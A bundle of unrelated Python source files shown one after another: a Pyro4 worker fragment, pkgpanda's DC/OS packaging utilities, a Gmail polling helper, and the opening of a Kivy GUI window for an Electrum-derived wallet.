return (self.busy)
@Pyro4.expose
@Pyro4.oneway
def shutdown(self):
self.logger.debug('WORKER: shutting down now!')
self.pyro_daemon.shutdown()
if not self.thread is None:
self.thread.join()
|
util.py
|
import hashlib
import http.server
import json
import logging
import os
import platform
import re
import shutil
import socketserver
import stat
import tarfile
import tempfile
from contextlib import contextmanager, ExitStack
from itertools import chain
from multiprocessing import Process
from shutil import rmtree
from typing import List
import requests
import retrying
import teamcity
import yaml
from requests.adapters import HTTPAdapter
from requests.packages.urllib3.util.retry import Retry
from teamcity.messages import TeamcityServiceMessages
from pkgpanda import subprocess
from pkgpanda.exceptions import FetchError, IncompleteDownloadError, ValidationError
log = logging.getLogger(__name__)
is_windows = platform.system() == "Windows"
def is_absolute_path(path):
if is_windows:
# We assume one char drive letter. Sometimes its two but not often
# pattern is <driveletter>:/string....
if path[1] == ':':
return True
else:
if path[0] == '/':
return True
return False
def remove_file(path):
"""removes a file. fails silently if the file does not exist"""
if is_windows:
# python library on Windows does not like symbolic links in directories
# so calling out to the cmd prompt to do this fixes that.
path = path.replace('/', '\\')
if os.path.exists(path):
subprocess.call(['cmd.exe', '/c', 'del', '/q', path])
else:
subprocess.check_call(['rm', '-f', path])
def remove_directory(path):
"""recursively removes a directory tree. fails silently if the tree does not exist"""
if is_windows:
# python library on Windows does not like symbolic links in directories
# so calling out to the cmd prompt to do this fixes that.
path = path.replace('/', '\\')
if os.path.exists(path):
subprocess.call(['cmd.exe', '/c', 'rmdir', '/s', '/q', path])
else:
subprocess.check_call(['rm', '-rf', path])
def make_directory(path):
"""Create a directory, creating intermediate directories if necessary"""
if is_windows:
path = path.replace('/', '\\')
if not os.path.exists(path):
os.makedirs(path)
def copy_file(src_path, dst_path):
"""copy a single directory item from one location to another"""
if is_windows:
# To make sure the copy works we are using cmd version as python
# libraries may not handle symbolic links and other things that are
# thrown at it.
src = src_path.replace('/', '\\')
dst = dst_path.replace('/', '\\')
subprocess.check_call(['cmd.exe', '/c', 'copy', src, dst])
else:
subprocess.check_call(['cp', src_path, dst_path])
def copy_directory(src_path, dst_path):
"""copy recursively a directory tree from one location to another"""
if is_windows:
# To make sure the copy works we are using cmd version as python
# libraries may not handle symbolic links and other things that are
# thrown at it.
src = src_path.replace('/', '\\')
dst = dst_path.replace('/', '\\')
subprocess.check_call(['cmd.exe', '/c', 'xcopy', src, dst, '/E', '/B', '/I'])
else:
subprocess.check_call(['cp', '-r', src_path, dst_path])
def variant_str(variant):
"""Return a string representation of variant."""
if variant is None:
return ''
return variant
def variant_object(variant_str):
"""Return a variant object from its string representation."""
if variant_str == '':
return None
return variant_str
def variant_name(variant):
"""Return a human-readable string representation of variant."""
if variant is None:
return '<default>'
return variant
def variant_prefix(variant):
"""Return a filename prefix for variant."""
if variant is None:
return ''
return variant + '.'
def variant_suffix(variant, delim='.'):
if variant is None:
return ''
return delim + variant
def get_requests_retry_session(max_retries=4, backoff_factor=1, status_forcelist=None):
status_forcelist = status_forcelist or [500, 502, 504]
# Default max retries 4 with sleeping between retries 1s, 2s, 4s, 8s
session = requests.Session()
custom_retry = Retry(total=max_retries,
backoff_factor=backoff_factor,
status_forcelist=status_forcelist)
custom_adapter = HTTPAdapter(max_retries=custom_retry)
# Any request through this session that starts with 'http://' or 'https://'
# will use the custom Transport Adapter created which include retries
session.mount('http://', custom_adapter)
session.mount('https://', custom_adapter)
return session
def _is_incomplete_download_error(exception):
return isinstance(exception, IncompleteDownloadError)
@retrying.retry(
stop_max_attempt_number=3,
wait_random_min=1000,
wait_random_max=2000,
retry_on_exception=_is_incomplete_download_error)
def _download_remote_file(out_filename, url):
with open(out_filename, "wb") as f:
r = get_requests_retry_session().get(url, stream=True)
r.raise_for_status()
total_bytes_read = 0
for chunk in r.iter_content(chunk_size=4096):
f.write(chunk)
total_bytes_read += len(chunk)
if 'content-length' in r.headers:
content_length = int(r.headers['content-length'])
if total_bytes_read != content_length:
raise IncompleteDownloadError(url, total_bytes_read, content_length)
return r
def download(out_filename, url, work_dir, rm_on_error=True):
assert os.path.isabs(out_filename)
assert os.path.isabs(work_dir)
work_dir = work_dir.rstrip('/')
# Strip off whitespace to make it so scheme matching doesn't fail because
# of simple user whitespace.
url = url.strip()
# Handle file:// urls specially since requests doesn't know about them.
try:
if url.startswith('file://'):
src_filename = url[len('file://'):]
if not os.path.isabs(src_filename):
src_filename = work_dir + '/' + src_filename
shutil.copyfile(src_filename, out_filename)
else:
_download_remote_file(out_filename, url)
except Exception as fetch_exception:
if rm_on_error:
rm_passed = False
# try / except so if remove fails we don't get an exception during an exception.
# Sets rm_passed to true so if this fails we can include a special error message in the
# FetchError
try:
os.remove(out_filename)
rm_passed = True
except Exception:
pass
else:
rm_passed = True
raise FetchError(url, out_filename, fetch_exception, rm_passed) from fetch_exception
def download_atomic(out_filename, url, work_dir):
assert os.path.isabs(out_filename)
tmp_filename = out_filename + '.tmp'
try:
download(tmp_filename, url, work_dir)
shutil.move(tmp_filename, out_filename)
except FetchError:
try:
os.remove(tmp_filename)
except:
pass
raise
def extract_tarball(path, target):
"""Extract the tarball into target.
If there are any errors, delete the folder being extracted to.
"""
# TODO(cmaloney): Validate extraction will pass before unpacking as much as possible.
# TODO(cmaloney): Unpack into a temporary directory then move into place to
# prevent partial extraction from ever laying around on the filesystem.
try:
assert os.path.exists(path), "Path doesn't exist but should: {}".format(path)
make_directory(target)
# TODO(tweidner): https://jira.mesosphere.com/browse/DCOS-48220
# Make this cross-platform via Python's tarfile module once
# https://bugs.python.org/issue21872 is fixed.
if is_windows:
subprocess.check_call(['bsdtar', '-xf', path, '-C', target])
else:
subprocess.check_call(['tar', '-xf', path, '-C', target])
except:
# If there are errors, we can't really cope since we are already in an error state.
rmtree(target, ignore_errors=True)
raise
def load_json(filename):
try:
with open(filename) as f:
return json.load(f)
except ValueError as ex:
raise ValueError("Invalid JSON in {0}: {1}".format(filename, ex)) from ex
class YamlParseError(Exception):
pass
def load_yaml(filename):
try:
with open(filename) as f:
return yaml.safe_load(f)
except yaml.YAMLError as ex:
raise YamlParseError("Invalid YAML in {}: {}".format(filename, ex)) from ex
def write_yaml(filename, data, **kwargs):
dumped_yaml = yaml.safe_dump(data, **kwargs)
write_string(filename, dumped_yaml)
def make_file(name):
with open(name, 'a'):
pass
def write_json(filename, data):
dumped_json = json_prettyprint(data=data)
write_string(filename, dumped_json)
def write_string(filename, data):
"""
Write a string to a file.
Overwrite any data in that file.
We use an atomic write practice of creating a temporary file and then
moving that temporary file to the given ``filename``. This prevents race
conditions such as the file being read by another process after it is
opened here but not yet written to.
It also prevents us from creating or truncating a file before we fail to
write data to it because of low disk space.
If no file already exists at ``filename``, the new file is created with
permissions 0o644.
"""
prefix = os.path.basename(filename)
tmp_file_dir = os.path.dirname(os.path.realpath(filename))
fd, temporary_filename = tempfile.mkstemp(prefix=prefix, dir=tmp_file_dir)
try:
permissions = os.stat(filename).st_mode
except FileNotFoundError:
log.debug("File %s does not exist, creating", filename)
permissions = 0o644
try:
try:
os.write(fd, data.encode())
finally:
os.close(fd)
os.chmod(temporary_filename, stat.S_IMODE(permissions))
os.replace(temporary_filename, filename)
except Exception:
os.remove(temporary_filename)
raise
def load_string(filename):
with open(filename) as f:
return f.read().strip()
def json_prettyprint(data):
return json.dumps(
data,
sort_keys=True,
indent=2,
separators=(',', ':'),
)
def if_exists(fn, *args, **kwargs):
try:
return fn(*args, **kwargs)
except FileNotFoundError as e:
log.debug(e)
return None
def sha1(filename):
hasher = hashlib.sha1()
with open(filename, 'rb') as fh:
while 1:
buf = fh.read(4096)
if not buf:
break
hasher.update(buf)
return hasher.hexdigest()
def expect_folder(path, files):
path_contents = os.listdir(path)
assert set(path_contents) == set(files)
def expect_fs(folder, contents):
if isinstance(contents, list):
expect_folder(folder, contents)
elif isinstance(contents, dict):
expect_folder(folder, contents.keys())
for path in iter(contents):
if contents[path] is not None:
expect_fs(os.path.join(folder, path), contents[path])
else:
raise ValueError("Invalid type {0} passed to expect_fs".format(type(contents)))
def _tar_filter(tar_info: tarfile.TarInfo) -> tarfile.TarInfo:
tar_info.uid = 0
tar_info.gid = 0
return tar_info
def make_tar(result_filename, change_folder):
tar_mode = ''
if is_windows:
tar_mode = 'w:gz'
else:
tar_mode = 'w:xz'
with tarfile.open(name=str(result_filename), mode=tar_mode) as tar:
tar.add(name=str(change_folder), arcname='./', filter=_tar_filter)
def rewrite_symlinks(root, old_prefix, new_prefix):
log.info("Rewrite symlinks in %s from %s to %s", root, old_prefix, new_prefix)
# Find the symlinks and rewrite them from old_prefix to new_prefix
# All symlinks not beginning with old_prefix are ignored because
# packages may contain arbitrary symlinks.
for root_dir, dirs, files in os.walk(root):
for name in chain(files, dirs):
full_path = os.path.join(root_dir, name)
if os.path.islink(full_path):
# Rewrite old_prefix to new_prefix if present.
target = os.readlink(full_path)
if target.startswith(old_prefix):
new_target = os.path.join(new_prefix, target[len(old_prefix) + 1:].lstrip('/'))
os.remove(full_path)
os.symlink(new_target, full_path)
def check_forbidden_services(path, services):
"""Check if package contains systemd services that may break DC/OS
This functions checks the contents of systemd's unit file dirs and
throws the exception if there are reserved services inside.
Args:
path: path where the package contents are
services: list of reserved services to look for
Raises:
ValidationError: Reserved serice names were found inside the package
"""
services_dir_regexp = re.compile(r'dcos.target.wants(?:_.+)?')
forbidden_srv_set = set(services)
pkg_srv_set = set()
for direntry in os.listdir(path):
if not services_dir_regexp.match(direntry):
continue
pkg_srv_set.update(set(os.listdir(os.path.join(path, direntry))))
found_units = forbidden_srv_set.intersection(pkg_srv_set)
if found_units:
msg = "Reverved unit names found: " + ','.join(found_units)
raise ValidationError(msg)
def run(cmd, *args, **kwargs):
proc = subprocess.Popen(cmd, *args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, **kwargs)
stdout, stderr = proc.communicate()
print("STDOUT: ", stdout.decode('utf-8'))
print("STDERR: ", stderr.decode('utf-8'))
if proc.returncode != 0:
raise subprocess.CalledProcessError(proc.returncode, cmd)
assert len(stderr) == 0
return stdout.decode('utf-8')
def launch_server(directory):
os.chdir("resources/repo")
httpd = socketserver.TCPServer(
("", 8000),
http.server.SimpleHTTPRequestHandler)
httpd.serve_forever()
class TestRepo:
def __init__(self, repo_dir):
self.__dir = repo_dir
def __enter__(self):
self.__server = Process(target=launch_server, args=(self.__dir))
self.__server.start()
def __exit__(self, exc_type, exc_value, traceback):
self.__server.join()
def resources_test_dir(path):
assert not path.startswith('/')
return "pkgpanda/test_resources/{}".format(path)
class MessageLogger:
"""Abstraction over TeamCity Build Messages
When pkgpanda is ran in a TeamCity environment additional meta-messages will be output to stdout
such that TeamCity can provide improved status reporting, log line highlighting, and failure
reporting. When pkgpanda is ran in an environment other than TeamCity all meta-messages will
silently be omitted.
TeamCity docs: https://confluence.jetbrains.com/display/TCD10/Build+Script+Interaction+with+TeamCity
"""
def __init__(self):
self.loggers = []
if teamcity.is_running_under_teamcity():
self.loggers.append(TeamcityServiceMessages())
else:
self.loggers.append(PrintLogger())
def _custom_message(self, text, status, error_details='', flow_id=None):
for log in self.loggers:
log.customMessage(text, status, errorDetails=error_details, flowId=flow_id)
@contextmanager
def _block(self, log, name, flow_id):
log.blockOpened(name, flowId=flow_id)
log.progressMessage(name)
yield
log.blockClosed(name, flowId=flow_id)
@contextmanager
def scope(self, name, flow_id=None):
"""
Creates a new scope for TeamCity messages. This method is intended to be called in a ``with`` statement
:param name: The name of the scope
:param flow_id: Optional flow id that can be used if ``name`` can be non-unique
"""
with ExitStack() as stack:
for log in self.loggers:
stack.enter_context(self._block(log, name, flow_id))
yield
def normal(self, text, flow_id=None):
self._custom_message(text=text, status='NORMAL', flow_id=flow_id)
def warning(self, text, flow_id=None):
self._custom_message(text=text, status='WARNING', flow_id=flow_id)
def error(self, text, flow_id=None, error_details=''):
self._custom_message(text=text, status='ERROR', flow_id=flow_id, error_details=error_details)
def failure(self, text, flow_id=None):
self._custom_message(text=text, status='FAILURE', flow_id=flow_id)
class PrintLogger:
def customMessage(self, text, status, errorDetails='', flowId=None): # noqa: N802, N803
print("{}: {} {}".format(status, text, errorDetails))
def progressMessage(self, message): # noqa: N802, N803
pass
def blockOpened(self, name, flowId=None): # noqa: N802, N803
print("starting: {}".format(name))
def blockClosed(self, name, flowId=None): # noqa: N802, N803
print("completed: {}".format(name))
logger = MessageLogger()
def hash_str(s: str):
hasher = hashlib.sha1()
hasher.update(s.encode('utf-8'))
return hasher.hexdigest()
def hash_int(i: int):
return hash_str(str(i))
def hash_dict(d: dict):
item_hashes = []
for k in sorted(d.keys()):
assert isinstance(k, str)
item_hashes.append("{0}={1}".format(k, hash_checkout(d[k])))
return hash_str(",".join(item_hashes))
def hash_list(l: List[str]):
item_hashes = []
for item in sorted(l):
item_hashes.append(hash_checkout(item))
return hash_str(",".join(item_hashes))
def hash_checkout(item):
if isinstance(item, str) or isinstance(item, bytes):
return hash_str(item)
elif isinstance(item, dict):
return hash_dict(item)
elif isinstance(item, list):
return hash_list(item)
elif isinstance(item, int):
return hash_int(item)
elif isinstance(item, set):
return hash_list(list(item))
else:
raise NotImplementedError("{} of type {}".format(item, type(item)))
def split_by_token(token_prefix, token_suffix, string_, strip_token_decoration=False):
"""Yield a sequence of (substring, is_token) pairs comprising the string.
The string is split by token boundary, where a token is a substring that
begins with the token prefix and ends with the token suffix. is_token is
True if the substring is a token. If strip_token_decoration is True, tokens
are yielded without their prefix and suffix. Each token prefix must have a
matching suffix, and vice versa. Tokens may not be nested.
>>> list(split_by_token('{', '}', 'some text {token} some more text'))
[('some text ', False), ('{token}', True), (' some more text', False)]
>>> list(split_by_token('{', '}', 'some text {token} some more text', strip_token_decoration=True))
[('some text ', False), ('token', True), (' some more text', False)]
"""
def _next_substring(superstring, substring, start):
idx = superstring.find(substring, start)
if idx < 0:
return None
return idx, idx + len(substring)
def _raise_exception_if_suffix_in(substring):
if token_suffix in substring:
logging.debug("Token suffix found without matching prefix in string: {}".format(repr(string_)))
raise Exception("Token suffix found without matching prefix")
if len(token_prefix) == 0:
raise ValueError('Token prefix must be a nonzero length string')
if len(token_suffix) == 0:
raise ValueError('Token suffix must be a nonzero length string')
if string_ == '':
yield string_, False
num_chars_consumed = 0
while num_chars_consumed < len(string_):
# Find the next token.
token_start = _next_substring(string_, token_prefix, num_chars_consumed)
if not token_start:
# No token found. Yield the rest of the string and return.
remainder = string_[num_chars_consumed:]
_raise_exception_if_suffix_in(remainder)
yield remainder, False
return
# Yield the string preceding the token, if any.
if token_start[0] > num_chars_consumed:
preceding_string = string_[num_chars_consumed:token_start[0]]
_raise_exception_if_suffix_in(preceding_string)
yield preceding_string, False
# Find the end of the token.
token_end = _next_substring(string_, token_suffix, token_start[1])
if not token_end or token_prefix in string_[token_start[1]:token_end[0]]:
# Can't find a closing suffix, or found two consecutive prefixes without a suffix between them.
logging.debug("Token prefix found without matching suffix in string: {}".format(repr(string_)))
raise Exception("Token prefix found without matching suffix")
# Yield the token.
if strip_token_decoration:
# Omit the token's prefix and suffix.
yield string_[token_start[1]:token_end[0]], True
else:
# Yield the entire token.
yield string_[token_start[0]:token_end[1]], True
# Update the chars consumed count for the next iteration.
num_chars_consumed = token_end[1]
|
gmail_sub.py
|
import calendar
import os
import threading
import time
from datetime import datetime, timezone
import apiclient
import httplib2
import oauth2client
credential_path = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../token.json")
def credentials():
store = oauth2client.file.Storage(credential_path)
return store.get()
def service():
http = credentials().authorize(httplib2.Http())
return apiclient.discovery.build("gmail", "v1", http=http, cache_discovery=False)
def get_messages_list(user_id, from_address, after):
if from_address is None:
query = f"after:{after}"
else:
query = f"from:{from_address} after:{after}"
return service().users().messages() \
.list(userId=user_id, q=query).execute()
def get_message_detail(id, user_id):
return service().users().messages().get(id=id, userId=user_id).execute()
class GmailSub():
interval = 1
is_running = True
last_time = None
from_address = None
message_handler = None
error_handler = None
def __init__(self, user_id):
self.user_id = user_id
self.thread = threading.Thread(target=self.__start)
self.thread.daemon = True
self.thread.start()
def set_interval(self, interval):
self.interval = interval
def set_from_address(self, address):
self.from_address = address
def on_message(self, callback):
self.message_handler = callback
def on_error(self, callback):
self.error_handler = callback
def stop(self):
self.is_running = False
def __start(self):
while self.is_running:
try:
ms = self.__get_messages()
if self.message_handler is not None:
self.message_handler(ms)
except Exception as ex:
if self.error_handler is not None:
self.error_handler(ex)
time.sleep(self.interval)
def __get_messages(self):
if self.last_time is None:
after = calendar.timegm(datetime.now(timezone.utc).timetuple())
else:
after = self.last_time + 1
now = calendar.timegm(datetime.now(timezone.utc).timetuple())
resp = get_messages_list(self.user_id,
from_address=self.from_address,
after=after)
messages = []
self.last_time = now
if 'messages' not in resp:
return messages
for m in resp['messages']:
detail = get_message_detail(m['id'], self.user_id)
messages.append(detail)
return messages
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum_mars.storage import WalletStorage, StorageReadWriteError
from electrum_mars.wallet_db import WalletDB
from electrum_mars.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum_mars.wallet import update_password_for_directory
from electrum_mars.plugin import run_hook
from electrum_mars import util
from electrum_mars.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum_mars.invoices import PR_PAID, PR_FAILED
from electrum_mars import blockchain
from electrum_mars.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_mars.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum_mars.logging import Logger
from electrum_mars.bitcoin import COIN
from electrum_mars.gui import messages
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum_mars.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum_mars.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum_mars.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum_mars.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_mars_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum_mars.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum_mars.util import (NoDynamicFeeEstimates, NotEnoughFunds,
BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME,
UserFacingException)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum_mars.simple_config import SimpleConfig
from electrum_mars.plugin import Plugins
from electrum_mars.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_gossip = BooleanProperty(False)
def on_use_gossip(self, instance, x):
self.electrum_config.set_key('use_gossip', self.use_gossip, True)
if self.network:
if self.use_gossip:
self.network.start_gossip()
else:
self.network.run_from_another_thread(
self.network.stop_gossip())
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
use_recoverable_channels = BooleanProperty(True)
def on_use_recoverable_channels(self, instance, x):
self.electrum_config.set_key('use_recoverable_channels', self.use_recoverable_channels, True)
def switch_to_send_screen(func):
# try until send_screen is available
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
@switch_to_send_screen
def set_ln_invoice(self, invoice):
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme == BITCOIN_BIP21_URI_SCHEME or scheme == LIGHTNING_URI_SCHEME:
self.set_URI(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / COIN
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = COIN * Decimal(fiat_amount) / Decimal(rate)
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str: str) -> Optional[int]:
if not amount_str:
return None
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_gossip = config.get('use_gossip', False)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data: str):
from electrum_mars.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.set_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
